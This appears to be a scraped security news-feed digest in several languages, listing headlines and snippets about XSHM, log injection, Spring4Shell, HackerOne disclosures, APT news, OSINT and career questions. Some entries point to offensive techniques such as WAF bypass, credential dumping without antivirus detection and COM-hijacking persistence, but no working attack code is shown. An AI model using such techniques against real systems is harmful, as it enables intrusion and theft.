    오늘은 Permissions-Policy(구 Feature Policy) 헤더에 대해 잠깐 이야기할까 합니다. Permissions-Policy Permissions Policy는 Feature Policy는 라고도 불리는 보안 정책 헤더이며 개발자가 다양한 브라우저 기능 및 API의 사용을 선택적으로 활성화 및 비활성화할 수 있는 메커니즘을 정의합니다. 전반적인 동작 방식은 CSP(Content-Security-Policy)와 유사합니다. 다만 CSP가 통제하는 성향의 정책이라면 Permissions Policy는 기능을 제어하는 정책입니다. 참고로 여기서 말한 기능이란 카메라, GPS와 같이 브라우저의 기능들을 의미합니다. 문법은 CSP와 동일하게 directive와 allowlist로 명시합니다. Permissions-Policy Permissions-Policy: directive=(allowlist), directive=(allowlist)
    XSHM (Cross Site History Manipulation)
    🔍 Introduction XSHM (Cross Site History Manipulation)은 사용자의 브라우저 히스토리를 이용한 공격 방법으로 단순히 이전 history를 변경하여 공격자가 의도한 페이지로 이동되도록 하는 피싱 방법부터, SOP를 우회하거나 CSRF 또는 IFRAME을 이용하여 중요 정보를 탈취하는데 사용할 수 있습니다. https://developer.mozilla.org/en-US/docs/Web/API/Window/history https://developer.mozilla.org/en-US/docs/Web/API/History 다만 history를 변경할 수 있었던 부분은 1 2 history.pushState('','','https://www.hahwul.com/fafa') history.replaceState('','','https://www.hahwul.com/z') 🗡 Offensive techniques Detect 해당 공격 방법은 단독으로 동작한다기 보단 XSS나 업로드된 파일 등 공격자가 통제할 수 있는 페이지에서 스크립트 삽입이 필요합니다.
  • Open

    SecWiki News 2022-04-08 Review
    通过覆盖Powershell cmdlet方式进行权限维持 by 风迷 漂亮侧信道:从timeless attack到pipeline的放大攻击 by ourren MITRE ATT&CKcon 3.0 Presentations on SlideShare by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-08 Review
    通过覆盖Powershell cmdlet方式进行权限维持 by 风迷 漂亮侧信道:从timeless attack到pipeline的放大攻击 by ourren MITRE ATT&CKcon 3.0 Presentations on SlideShare by ourren 更多最新文章,请访问SecWiki
  • Open

    The Case for 2FA by Default for WordPress
    Administrator panel compromises are one of the most common attacks that everyday WordPress website admins face. We work with thousands of clients who have encountered attacks on their websites and I’ve long ago lost count of the number of times that I’ve told clients that the point of entry was their WordPress login page. Brute force attacks and compromised administrator users are overwhelmingly the most common attack vectors for the CMS platform, which as of 2022 makes up over 40% of the entire web. Continue reading The Case for 2FA by Default for WordPress at Sucuri Blog.
  • Open

    Timestomping Registry Keys
    If you're worked in DFIR or threat intel for any amount of time, you've likely either seen or heard how threat actors modify systems to meet their own needs, configuring systems to provide data or hide their activities, as they make their way through an infrastructure. From disabling services, to modifying the system to maintain credentials in memory in plain text, to clearing Windows Event Logs, sometimes it seems that the threat actor knows more about the platform than the administrators. These system modifications are used to either provide easier access to the threat actor, or hide the impacts of their activities by "blinding" the administrators, or simply be removing clear evidence of the activity. Sometimes these system modifications go beyond the administrators, and meant to instead…
  • Open

    Binary Exploitation (Pwn) Challenge Walkthroughs - PicoCTF 2022 (BEGINNER-FRIENDLY)
    submitted by /u/_CryptoCat23 [link] [comments]
  • Open

    FreeBuf 早报 | FIN7 成员被判5年有期徒刑;全球供应链攻击2021年下半年激增51%
    网络犯罪组织FIN7的高级成员Denys Iarmak于当地时间周四被一名美国法官判处五年监禁。
    零时科技 | APE 攻击事件分析
    攻击者可以通过闪电贷兑换 NFT 来获取 APE 空投,再将 NFT 铸币归还闪电贷会对项目造成威胁。
    首个针对AWS Lambda无服务器平台的恶意软件出现了
    该恶意软件使用更新的命令和控制流量地址解析技术,以规避典型的检测措施和虚拟网络访问控制。
    FIN7 黑客组织成员被判处 5 年有期徒刑
    一名 FIN7 黑客组织渗透测试员因窃取信用卡信息,被判处 5 年监禁。
    FreeBuf甲方群话题讨论 | 聊聊企业API安全
    不安全的API已成为网络攻击者的主要目标之一,我们应该如何规避?相对安全的API又应该是怎样的?
    俄罗斯石油巨头Gazprom Neft网站因遭黑客攻击而关闭
    俄罗斯国家天然气公司Gazprom的石油部门Gazprom Neft网站因遭黑客攻击而被迫关闭。
    谷歌通过新的开发策略以提高Android安全性
    4月6日,谷歌宣布了针对 Android 应用程序开发人员的几项关键政策更新,以提高用户、Google Play 和相关应用程序的安全性。
    FreeBuf周报 | 三星手机曝重大漏洞;福克斯新闻泄露 1300 万条数据
    福克斯新闻泄露 1300 万条数据,包含员工信息。
    全球高级持续性威胁(APT)2021年度报告
    北京地区以及广东、福建、浙江、江苏等沿海省份作为我国政治中心、经济发达地区,是境外APT组织进行网络攻击的主要目标地区。
    多重监管之下,谁还在“挖矿”?
    自2021年以来,针对虚拟货币“挖矿”的监管持续加码的情况下,谁还在挖矿?
  • Open

    Movies and assorted stuff.
    submitted by /u/omnifage [link] [comments]
  • Open

    Duqu malware | Cybersecurity
    submitted by /u/OkFaithlessness2414 [link] [comments]
    Any good threat hunting resources? Looking for query libraries.
    Currently using Sigma and Microsoft query libraries. New to threat hunting, and looking to learn more about resources that are out there. Thanks. submitted by /u/haloman882 [link] [comments]
  • Open

    Understanding Python 2 Vulnerabilities
    Introduction Continue reading on InfoSec Write-ups »
    TOR: The Less Secure Side With Potential Vulnerabilities.
    No content preview
  • Open

    Understanding Python 2 Vulnerabilities
    Introduction Continue reading on InfoSec Write-ups »
    TOR: The Less Secure Side With Potential Vulnerabilities.
    No content preview
  • Open

    Understanding Python 2 Vulnerabilities
    Introduction Continue reading on InfoSec Write-ups »
    TOR: The Less Secure Side With Potential Vulnerabilities.
    No content preview

  • Open

    PCI DSS v4.0 Resource Hub
    submitted by /u/Pomerium_CMo [link] [comments]
    fullhunt/spring4shell-scan: A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities
    submitted by /u/mazen160 [link] [comments]
    Denonia: The First Malware Specifically Targeting Lambda
    submitted by /u/lormayna [link] [comments]
    SpiderFoot 4.0 release - introducing YAML correlation rules
    submitted by /u/smicallef [link] [comments]
    Spring Framework RCE (CVE-2022-22965) Nmap (NSE) Checker (Non-Intrusive)
    submitted by /u/alt3kx [link] [comments]
  • Open

    记一次hackmyvm综合靶场的渗透测试-helium
    本靶场内容过于真实,仅用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!
    FreeBuf 早报 | 谷歌下架数款收集用户数据的应用;蔚来员工被曝利用公司服务器挖矿
    据称,涉事人是蔚来汽车员工,此前担任某集群服务器管理员。在职期间,利用职务上的便利,用公司服务器挖虚拟货币。
    Cash App数据泄露恐将影响820万美国用户
    近日,美国支付巨头Block披露了一项与投资应用Cash App有关的数据泄露事件,并将此事件告知了其820万美国用户。
    VMware 多个产品中爆出严重漏洞
    VMware 多个产品中存在关键漏洞,攻击者能够利用这些漏洞发起远程代码执行攻击。
    南非和美国调查人员联手突袭BEC诈骗团伙
    南非和美国调查人员联手逮捕了和臭名昭著的尼日利亚商业电子邮件诈骗(BEC)集团相关联的数名诈骗团伙成员。
    值得警惕!新型恶意软件FFDroider正对 Facebook等社交帐户下手
    Zscaler的研究人员表示,该恶意软件通过窃取存储在浏览器中的凭证和 cookie 以劫持受害者的​​社交媒体帐户。
    BruteXSS:XSS暴力破解神器
    本文介绍了一款自动进行插入XSS,并且可以自定义攻击载荷。
    Android平台渗透测试套件zANTI v2.5发布(含详细说明)
    zANTI是一款Android平台下的渗透测试工具,支持嗅探已连接的网络、支持中间人攻击测试、端口扫描、Cookie获取及路由安全测试等操作。
    神器Nmap web版:Rainmap Lite
    Nmap对应Web应用程序Rainmap Lite,允许用户从手机/平板电脑/网络浏览器启动Nmap扫描!
  • Open

    Ukraine — Point de situation au 8 avril
    Les dernières 24h Continue reading on Medium »
    Утиліти консолі Linux для мережевої розвідки доменів
    Під “мережевою розвідкою” розуміється збір інформації про домен з відкритих джерел, себто Open Source Intelligence (OSINT). У цій статті я… Continue reading on KR. LABORATORIES IT BLOG »
    Утиліти консолі Linux для мережевої розвідки доменів
    Під “мережевою розвідкою” розуміється збір інформації про домен з відкритих джерел, себто Open Source Intelligence (OSINT). У цій статті я… Continue reading on Medium »
    War in Ukraine / April 6
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Logging information about users through news
    Let’s talk about masking logged links using the https://telegra.ph/ Continue reading on Medium »
    Virtual OSINT labs…
    Small topic. But without it, you just can’t. Virtual OSINT labs that will be useful for security researchers as well. Choose your…… Continue reading on Medium »
  • Open

    Exposed Golang Pprof debugger at https://cn-geo1.uber.com/
    Uber disclosed a bug submitted by boobalan123: https://hackerone.com/reports/1385906 - Bounty: $500
    Chain of IDORs Between U4B and Vouchers APIs Allows Attackers to View and Modify Program/Voucher Policies and to Obtain Organization Employees' PII
    Uber disclosed a bug submitted by hunt4p1zza: https://hackerone.com/reports/1148697 - Bounty: $10250
    Reflected XSS on []
    U.S. Dept Of Defense disclosed a bug submitted by saajanbhujel: https://hackerone.com/reports/1267380
    [www.] Path-based reflected Cross Site Scripting
    U.S. Dept Of Defense disclosed a bug submitted by geeknik: https://hackerone.com/reports/1159371
    [CVE-2020-3452] on
    U.S. Dept Of Defense disclosed a bug submitted by splint3rsec: https://hackerone.com/reports/1234925
    username and password leaked via pptx for website
    U.S. Dept Of Defense disclosed a bug submitted by ibrahimatix_: https://hackerone.com/reports/1512199
    Broken access control, can lead to legitimate user data loss
    U.S. Dept Of Defense disclosed a bug submitted by lubak: https://hackerone.com/reports/1493007
    Authorization bypass -> IDOR -> PII Leakage
    U.S. Dept Of Defense disclosed a bug submitted by lubak: https://hackerone.com/reports/1489470
    Cross-site Scripting (XSS) - Reflected at https:///
    U.S. Dept Of Defense disclosed a bug submitted by mamunwhh: https://hackerone.com/reports/1370746
    SQL Injection in
    U.S. Dept Of Defense disclosed a bug submitted by lubak: https://hackerone.com/reports/1489744
    XSS on https:///' parameter
    U.S. Dept Of Defense disclosed a bug submitted by homosec: https://hackerone.com/reports/1252020
    XSS on https:/// parameter
    U.S. Dept Of Defense disclosed a bug submitted by homosec: https://hackerone.com/reports/1252229
    XSS on https:/// via parameter
    U.S. Dept Of Defense disclosed a bug submitted by homosec: https://hackerone.com/reports/1252059
    XSS on https:/// via parameter
    U.S. Dept Of Defense disclosed a bug submitted by homosec: https://hackerone.com/reports/1251868
    Open Akamai ARL XSS at
    U.S. Dept Of Defense disclosed a bug submitted by whoisbinit: https://hackerone.com/reports/1317031
    Bypassing CORS Misconfiguration Leads to Sensitive Exposure at https:///
    U.S. Dept Of Defense disclosed a bug submitted by whoisbinit: https://hackerone.com/reports/1092125
    XSS Reflected -
    U.S. Dept Of Defense disclosed a bug submitted by drauschkolb: https://hackerone.com/reports/1223575
    Uninstalling Rockstar Games Launcher for Windows (64-bit), then reinstalling keeps you logged in without authentication
    Rockstar Games disclosed a bug submitted by toxiqcitee: https://hackerone.com/reports/1278261 - Bounty: $250
  • Open

    A Detailed Guide on Cewl
    Hi, Pentesters! In this article, we are going to focus on the Kali Linux tool “Cewl” which will basically help you to create a wordlist. The post A Detailed Guide on Cewl appeared first on Hacking Articles.
    A Detailed Guide on Cewl
    Hi, Pentesters! In this article, we are going to focus on the Kali Linux tool “Cewl” which will basically help you to create a wordlist. The post A Detailed Guide on Cewl appeared first on Hacking Articles.
  • Open

    vulnerabilityMultiple vulnerability leading to account takeover in TikTok SMB subdomain.
    I’m here to tell you how I account takeover in TikTok I submitted this bug in HackerOne and I got 1000$ for this bug Continue reading on Medium »
    SuperBots Bug Bounty is here! Win up to $25,000!
    Continue reading on Medium »
    DonPAPI — Dumping DPAPI Credz Remotely
    Dumping revelant information on compromised targets without AV detection  DPAPI dumping Continue reading on Medium »
    Personal Security Checklist
    A curated checklist of tips to protect your digital security and privacy Continue reading on Medium »
    Recon tool for bug bounty
    Layla is a python script that automatically performs recon on a given URL. It combines the outputs of other known tools into a single one. Continue reading on Medium »
    scarce-apache2-a-framework-for-bug-hunting-or-pentesting-targeting-websites-that-have-cve-2021–41773…
    This tool can scan websites with CVE-2021–41773 Vulnerability that are affecting Apache2 Webserver, ScaRCE can run too for executing… Continue reading on Medium »
    Web-Hacking-Toolkit — A Multi-Platform Web Hacking Toolkit Docker Image With Graphical User…
    A multi-platform web hacking toolkit Docker image with Graphical User Interface (GUI) support. Installation Continue reading on Medium »
  • Open

    Hunting Secrets from Containers by Analysing Docker Images
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Looking for advice on my next SANS course.
    Company is buying... I'm in Incident Response (3 years). Passed my 508 last year and now I have the opportunity to take another course. I have been tossing around the idea of moving from IR to a different area like detection engineering, hunting/intel or attempting to move to a dedicated Purple Team full time. Would taking FOR578 be the best step forward as far as flexibility in career advancements go? Maybe something else? submitted by /u/SlowBoatToHades [link] [comments]
    Getting back on track after a long break
    Hi guys, I'm a cybersec engineer that had some kind of break from security (I learnt lots of web development for the last 6 months or so) and well I really got out of shape. Now, I would like to get back on track and I was looking for resources / advice on how to do this better if any of you want to share. I really appreciate the help! submitted by /u/GeologistLegitimate6 [link] [comments]
    Been studying for OSCP for 250+ hours and i'm starting to doubt it's relevance to real pentesting. Looking for guidance
    Some background on me: I used to be a programmer (2.5 years) Quit my job to pursue my passion, offensive cyber security OSCP seemed like a great option for someone who hates written exams like me and loved the brutal nature of a 24 hour skill based exam been documenting my noob to OSCP journey on youtube, week by week: https://youtube.com/playlist?list=PLSGxDsVUZ-zzB4DzUb4b2lfihBFgj53eU The OSCP exam is a network penetration testing exam, strictly. There is little to no web exploitation. I was having a talk with a friend of mine on a CTF team I joined and he mentioned that network penetration testing is less relevant than it was in the past. Now, the OSCP does cover active directory and basic buffer overflow, which seems nice to know for sure. However the initial foothold often relies on heavily out of date software (think: 2006) for which an RCE exploit is readily available on exploit-db. Having worked as a developer for a few years, yeah i can confirm everything we do is based on web apps. Everything. Especially with work from home, i mean sometimes in companies that utilize remote work heavily there is no "domain controller". Just a bunch of devs collaborating on github or bitbucket. I'd say i'm about 250 more hours away from being OSCP ready (half way there) and i think that time would be better served on hackthebox, hackerone, and doing CTF's with my team. Given what i know about the OSCP i don't believe these things will help much with passing the exam even though they would make me a better professional. It's really one or the other. TLDR: Penetration testers, security engineers, etc: how important is network penetration to your job functions? (AKA, how relevant is OSCP?) Thanks in advance for your guidance. submitted by /u/NSP781 [link] [comments]
    I feel like i am wasting my time .
    Hi,24 [M] basically I was in computer engineering school 4 years ago. But it was shit,the exams were literally copy paste from past exams and people didn’t study they just memorised. I had anxiety during exams and could never think with a clear head,i was very depressed,and i failed 3 semester straight with all F’s . So i transferred to MIS school,business informatics. I took programming courses,basic networks,and basic hardware,and introduction to information security course . But i self studied many concepts in computer science like ML,web,game dev,and finally security. Right now I am doing an internship as a technical support, i am learning about Sophos firewall and later will learn about Azure and cloud security. I am ‘Script kiddie’ on hackthebox but i am getting better, i consider m…
    GAQM CISP good next step?
    Hi everyone going to do my security + soon wondering if CISP from GAQM is a good next step after sec+. when ever i try to find info on it the search is over run by CISSP which is a more challenging certification. submitted by /u/Namibguy [link] [comments]
    Looking for cybersecurity or digital privacy ideas / topics for my undergraduate degree
    Hi, I'm in the planning phase of my bachelors degree in information technology. I want to write about either cybersecurity and / or digital privacy. I have two main ideas currently: To set up a / or several honeypot services (WordPress sites, E-commerce website and or incomplete web apps) and collect the data running through them from bots and hopefully unsuspecting bad actors. To create a browser add-on or web app to visualize, in 3D (webgl), the trackers that are currently tracking you on a website. Any comments on the above mentioned topics, or any other interesting topics regarding: cybersecurity, digital privacy, big brother society and / or cryptography would be highly appreciated. submitted by /u/krullmizter [link] [comments]
    Netskope - Accidental install on personal PC, What can be seen?
    I am a consultant and work with many companies. One incorrectly pegged me as an FTE and sent an urgent email to download Netskope to access their data. I downloaded it and opened but didn't realize it actually installed anything. Got some text box that I thought was an error. Later that day found out it was not necessary for me to have Netskope. Today, I tried to access a website blocked by the company's acceptable use policy and found out that Netskope was in fact installed and has been active for a couple of weeks. I uninstalled it and have been able to access all websites again. Questions: 1) what exactly can a tool like this see? I assume my web browsing history which is whatever, but can it see what Google Analytics data or otherwise I accessed for my other clients? What if I didn't download anything? Can it see my Google Drive documents not related to the specific company email? Can it see all of my passwords? 2) is it worthwhile to ask the client company to delete my data? 3) i uninstalled it which stopped it from blocking my access to websites. Is this enough or should I hard reset my entire computer? submitted by /u/phillytrees [link] [comments]
  • Open

    SecWiki News 2022-04-07 Review
    APT取证分析中的数据压缩 by ourren 元宇宙与国家数据安全:构建生态化治理体系的挑战与趋势 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-07 Review
    APT取证分析中的数据压缩 by ourren 元宇宙与国家数据安全:构建生态化治理体系的挑战与趋势 by ourren 更多最新文章,请访问SecWiki
  • Open

    Mental Models
    This page contains my collection of mental models I use for decision-making, business, and life in general. Some models are more practical and, as such, can be applied to everyday situations. Others can be used for long-term decisions or to enjoy in a thought process. Keep in mind that one should never be stuck thinking with common frameworks like the ones provided here. You should use your judgment and adjust to your situations. It is also essential to understand that these mental models are meaningless unless you internalize them. Further reading and practice are required. Circle of competence Focus on what you know. Double down on your strengths, and do not obsess about your weaknesses. For example, Einstein might not be the best pick for a basketball team, but that does not mean he is …
  • Open

    Getting more information about IP hosted by AWS
    I am trying to prove that a phishing email that I received was sent from the IT department at my institution as a way to help people "learn" not to click on links from unknown senders. The email header traces back to an IP at AWS. I know very little about tools and resources to dig further into the real source of a message like this. Is it possible, and if so, can anyone suggest some tools that I should look in to? submitted by /u/sudomakemetacos [link] [comments]
  • Open

    Log Injection
    🔍 Introduction Log Injection은 사용자 입력이 로그에 포함되는 경우 공격자가 이를 이용해 로그 항목을 위조하거나 악성 내용을 로그에 삽입할 수 있습니다. 🗡 Offensive techniques Detect WhiteBox 소스코드 또는 로그를 확인할 수 있는 경우 식별하기 쉽습니다. 에러 로그에서 사용자의 입력 값을 포함하여 로깅하는 경우 해당 취약점의 영향을 받습니다. 코드레벨: 각 언어에서 로그를 작성하는 부분 중 사용자 입력이 존재하는지 체크 로그레벨: 실제로 웹 요청을 통해 에러를 유도하고, 기록되는 로그를 체크 언어 별 취약한 코드는 Vulncat에 정리되어 있으니 해당 문서를 참고해주세요.
  • Open

    Module-2 | OWASP ModSecurity Core Rule Set -Pentesting & Bypassing Cloud Web Application Firewall…
    No content preview
    Series of Network Fundamentals #5 (Ports & Protocols),to get started in Cyber Security.
    No content preview
  • Open

    Module-2 | OWASP ModSecurity Core Rule Set -Pentesting & Bypassing Cloud Web Application Firewall…
    No content preview
    Series of Network Fundamentals #5 (Ports & Protocols),to get started in Cyber Security.
    No content preview
  • Open

    Module-2 | OWASP ModSecurity Core Rule Set -Pentesting & Bypassing Cloud Web Application Firewall…
    No content preview
    Series of Network Fundamentals #5 (Ports & Protocols),to get started in Cyber Security.
    No content preview
  • Open

    从 dotnet 源码看文件上传绕 waf
    作者:Y4er 原文链接:https://y4er.com/post/fileupload-bypass-with-dotnet/ 前言 看了赛博群的《从commons-fileupload源码看文件上传绕waf》,文末提到了dotnet也有这种问题,于是看了下dotnet的源码。 环境 public ActionResult Index() { if (Request.Files....
    CVE-2022-22947 SpringCloud GateWay SPEL RCE Echo Response
    作者:Y4er 原文链接:https://y4er.com/post/cve-2022-22947-springcloud-gateway-spel-rce-echo-response/ 环境 git clone https://github.com/spring-cloud/spring-cloud-gateway cd spring-cloud-gateway git checkout ...
  • Open

    从 dotnet 源码看文件上传绕 waf
    作者:Y4er 原文链接:https://y4er.com/post/fileupload-bypass-with-dotnet/ 前言 看了赛博群的《从commons-fileupload源码看文件上传绕waf》,文末提到了dotnet也有这种问题,于是看了下dotnet的源码。 环境 public ActionResult Index() { if (Request.Files....
    CVE-2022-22947 SpringCloud GateWay SPEL RCE Echo Response
    作者:Y4er 原文链接:https://y4er.com/post/cve-2022-22947-springcloud-gateway-spel-rce-echo-response/ 环境 git clone https://github.com/spring-cloud/spring-cloud-gateway cd spring-cloud-gateway git checkout ...
  • Open

    Spring Framework RCE (CVE-2022-22965) NMAP (NSE) Checker (Non-Intrusive)
    Article URL: https://github.com/alt3kx/CVE-2022-22965 Comments URL: https://news.ycombinator.com/item?id=30941327 Points: 1 # Comments: 0

  • Open

    FIN7 Power Hour: Adversary Archaeology and the Evolution of FIN7
    submitted by /u/dmchell [link] [comments]
  • Open

    Ok so how do I know for sure if my iPhone is hacked?
    Any suggestions? submitted by /u/Unlucky_Cut_2534 [link] [comments]
    Easy and basic tls mitm proxy?
    I wish to look into some application traffic that is transported over tls, I found this proxy https://docs.mitmproxy.org/stable/concepts-howmitmproxyworks/ Do any of you have experience with this or other solutions you would recommend? submitted by /u/koera [link] [comments]
    Subdomain MX records
    Are there any security implications to consider when adding an mx record to a subdomain that points to a trusted 3rd party vendor? submitted by /u/mtx4gk [link] [comments]
    Pen Testing
    Who from IT Security would be tasked with sourcing a vendor for pen testing? What would be their job title? submitted by /u/bluesail1021 [link] [comments]
    Podcast idea
    I was thinking about a way to spend my extra time and I thought of an idea of starting a podcast to interview cyber professionals about how they got into cyber and hear their stories. Ive never podcasted before but I imagine it would be casual conversation with some standard conversations strictly focused on their careers. I don't know if anything like this is already out there but I could see this serving a need because I constantly see people posting things like " how do I get into cyber" etc. I was thinking about having diversity in people and jobs where you have you traditional technical jobs but also pivot into the none technical roles like GRC, sales, project MGMT, etc that still have a need in the field. I guess I'm looking for some feedback...on a surface level, would this be something of interest for you? submitted by /u/gnomeparadox [link] [comments]
  • Open

    Ukraine — Point de situation au 7 avril
    Les dernières 24h Continue reading on Medium »
    The Academy of the Ministry of Internal Affairs of Russia will prepare manuals for the fight…
    “Based on an application from the Investigation Department of the Ministry of Internal Affairs of Russia, we are developing methodological… Continue reading on Medium »
    War in Ukraine / April 5
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    How to set the approximate location of a person using the Yandex search engine?
    It’s no secret that search engines collect information about their users. But this allows us to determine the location of your target by… Continue reading on Medium »
    Ukraine — Point de situation au 6 avril
    Les dernières 24h Continue reading on Medium »
  • Open

    Hacker Interview #2: Alvin “Steiner254”
    Learning cybersecurity comes in many forms: technical practice, lab workshops, and also writeups. Bug bounty hunter Alvin, going by the… Continue reading on HackenProof »
    What is SQL Injection?
    What is It? Continue reading on Medium »
    How i got access to 1600k Users PII Data $$$$
    Hello Guys 👋 I am Gokul, Python developer, Cyber security researcher, Part time Bug hunter and Open source tool maker, Studying 3rd year… Continue reading on Medium »
    [NEW EVENT] BUG HUNTING BOUNTY IN STMAN TESTNET
    Dear Stickmen, you must be all very excited to experience the Testnet version to be released today. To celebrate this event and create the… Continue reading on Medium »
    Top 5 Geeky Websites 2022
    Hi everyone, hope you doing great. So today I’ll introduce you to five amazing websites which can be very helpful for everyone and I… Continue reading on Medium »
    Watch out the links : Account takeover
    This is my second writeup here :), Hope you find enjoy it too! Continue reading on Medium »
  • Open

    Ghostwriter v2.3.0 & 2022 Road Map
    Ghostwriter is changing! We have a new release candidate and a GraphQL API open for feedback. Continue reading on Posts By SpecterOps Team Members »
  • Open

    SecWiki News 2022-04-06 Review
    Netgear R8300栈溢出漏洞分析 by chamd5 无人机MAVLINK协议安全剖析 by chamd5 MITRE ATT&CK 第四轮评估结果发布 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-06 Review
    Netgear R8300栈溢出漏洞分析 by chamd5 无人机MAVLINK协议安全剖析 by chamd5 MITRE ATT&CK 第四轮评估结果发布 by Avenger 更多最新文章,请访问SecWiki
  • Open

    Validate AWS CloudFormation templates for security misconfigurations and vulnerabilities (online tool)
    submitted by /u/elitistAlmond [link] [comments]
    Dirty Pipe Explained - CVE-2022-0847
    submitted by /u/freakwin [link] [comments]
    RedFat: A Binary Hardening System for Linux/ELF/x64
    submitted by /u/zoomT [link] [comments]
  • Open

    Burp Scanner can now crawl static sites between 6x - 9x faster
    Burp Suite Professional version 2022.2.3 made Burp Scanner's crawler between 6x - 9x faster when used against static or stateless sites. This helps you to carry out automated reconnaissance much faste
  • Open

    Burp Scanner can now crawl static sites between 6x - 9x faster
    Burp Suite Professional version 2022.2.3 made Burp Scanner's crawler between 6x - 9x faster when used against static or stateless sites. This helps you to carry out automated reconnaissance much faste
  • Open

    FreeBuf 早报 | Twitter 限制俄罗斯政府账号;英特尔关闭了在俄罗斯的所有业务
    Twitter 限制了来自 300 多个俄罗斯政府官方账号的内容,其中包括俄罗斯总统普京的账号。
    乌克兰 CERT-UA警告,俄相关Armageddon APT组织正攻击乌克兰国家机构
    近日,乌克兰 CERT-UA 应急响应小组发布了一份安全报告,提醒国内组织机构警惕俄罗斯相关的网络间谍组织Armageddon APT。
    Gartner:六个步骤制定云战略
    2022 年,企业机构的创新技术不断迸发,势必会凭借新的技术,优化云部署方案。
    【干货】Spring远程命令执行漏洞(CVE-2022-22965)原理分析和思考
    本文章对该漏洞进行了复现和分析,希望能够帮助到有相关有需要的人员进一步研究。
    俄语黑客论坛出现新型窃密木马BlackGuard,售价每月200美元
    研究人员发现了 BlackGuard 在黑客论坛提供恶意软件即服务。
    俄乌冲突中蠢蠢欲动的多个APT组织
    一个月前,俄乌冲突搅动全球,世界各地的 APT 组织也以相关话题作为诱饵展开攻击。
    德国关闭了全球最大暗网市场 Hydra
    德国关闭全球最大的暗网市场 Hydra,并没收 2500 万美元。
    零售商The Works在遭遇网络攻击后被迫关闭商店
    英国领先的商业街零售商The Works在遭受网络攻击后被迫关闭了部分门店,并暂停了其部分业务。
    微软在其云服务中检测到 Spring4Shell 攻击
    微软表示,自该漏洞出现以来,就监测到了利用云服务中Spring Cloud 和 Spring Core 漏洞进行的持续性攻击。
  • Open

    Windows Persistence: COM Hijacking (MITRE: T1546.015)
    Introduction According to MITRE, “Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking The post Windows Persistence: COM Hijacking (MITRE: T1546.015) appeared first on Hacking Articles.
    Windows Persistence: COM Hijacking (MITRE: T1546.015)
    Introduction According to MITRE, “Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking The post Windows Persistence: COM Hijacking (MITRE: T1546.015) appeared first on Hacking Articles.
  • Open

    OSINT Dojo: Sakura
    No content preview
    picoCTF 2022- Writeup
    No content preview
  • Open

    OSINT Dojo: Sakura
    No content preview
    picoCTF 2022- Writeup
    No content preview
  • Open

    OSINT Dojo: Sakura
    No content preview
    picoCTF 2022- Writeup
    No content preview
  • Open

    Spring 远程命令执行漏洞(CVE-2022-22965)原理分析和思考
    作者:麦兜 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前言 上周网上爆出Spring框架存在RCE漏洞,野外流传了一小段时间后,Spring官方在3月31日正式发布了漏洞信息,漏洞编号为CVE-2022-22965。本文章对该漏洞进行了复现和分析,希望能够帮助到有相关有需要的人员进一步研究。 一、前置知识 1....
    Chrome Mojo 组件的沙箱逃逸漏洞分析
    作者:天玄安全实验室 原文链接:https://mp.weixin.qq.com/s/tGwCwOQ8eAwm26fHXTCy5A 漏洞说明 Issue-1062091为chrom中存在的一个UAF漏洞,此漏洞存在于chromium的Mojo框架中,利用此漏洞可以导致chrome与基于chromium的浏览器沙箱逃逸。这个漏洞是在Chrome 81.0.4041.0的提交中引入的。在几周后,...
  • Open

    Spring 远程命令执行漏洞(CVE-2022-22965)原理分析和思考
    作者:麦兜 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前言 上周网上爆出Spring框架存在RCE漏洞,野外流传了一小段时间后,Spring官方在3月31日正式发布了漏洞信息,漏洞编号为CVE-2022-22965。本文章对该漏洞进行了复现和分析,希望能够帮助到有相关有需要的人员进一步研究。 一、前置知识 1....
    Chrome Mojo 组件的沙箱逃逸漏洞分析
    作者:天玄安全实验室 原文链接:https://mp.weixin.qq.com/s/tGwCwOQ8eAwm26fHXTCy5A 漏洞说明 Issue-1062091为chrom中存在的一个UAF漏洞,此漏洞存在于chromium的Mojo框架中,利用此漏洞可以导致chrome与基于chromium的浏览器沙箱逃逸。这个漏洞是在Chrome 81.0.4041.0的提交中引入的。在几周后,...
  • Open

    Attacker shall recieve order updates on whatsapp for users who have activated whatsapp notification
    Zomato disclosed a bug submitted by schutzx0r: https://hackerone.com/reports/1523584 - Bounty: $300
  • Open

    Anyone got an extra sans GCFA practice test?
    PM me. Much appreciated submitted by /u/CrazyKitty2016 [link] [comments]

  • Open

    Telegram OSINT: Generating a data ‘backbone’ for investigation
    With Telegram growing ever more popular, vast amounts of data are being generated which we can use to map trends and fuel investigations… Continue reading on Medium »
    ElasticSearch’i kullanarak açık veritabanları nasıl bulunur
    shodan ile neler yapabiliriz Continue reading on Medium »
    OSINT Dojo: Sakura
    In this article, I learn how to use Open Source Intelligence (OSINT) techniques to identify a number of identifiers and other pieces of… Continue reading on InfoSec Write-ups »
    War in Ukraine / April 4
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Tools for internet anonymity and in case of internet blockage (Part 2).
    VPN for mobile devices: Continue reading on Medium »
    Bigdata analysis and eDiscovery
    ICIJ Datashare — an eDiscovery tool that allows you to quickly and easily index and search multiple documents. And, according to the user… Continue reading on Medium »
    Deep web OSINT
    OSINT (Open Source Intelligence) is widely used in our community..and mostly free. Continue reading on Medium »
    TryHackMe: Subdomain Enumeration Writeup
    This room aims to teach the various ways of discovering subdomains to expand your attack surface of a target. We will learn about 3… Continue reading on Medium »
  • Open

    /r/netsec's Q2 2022 Information Security Hiring Thread
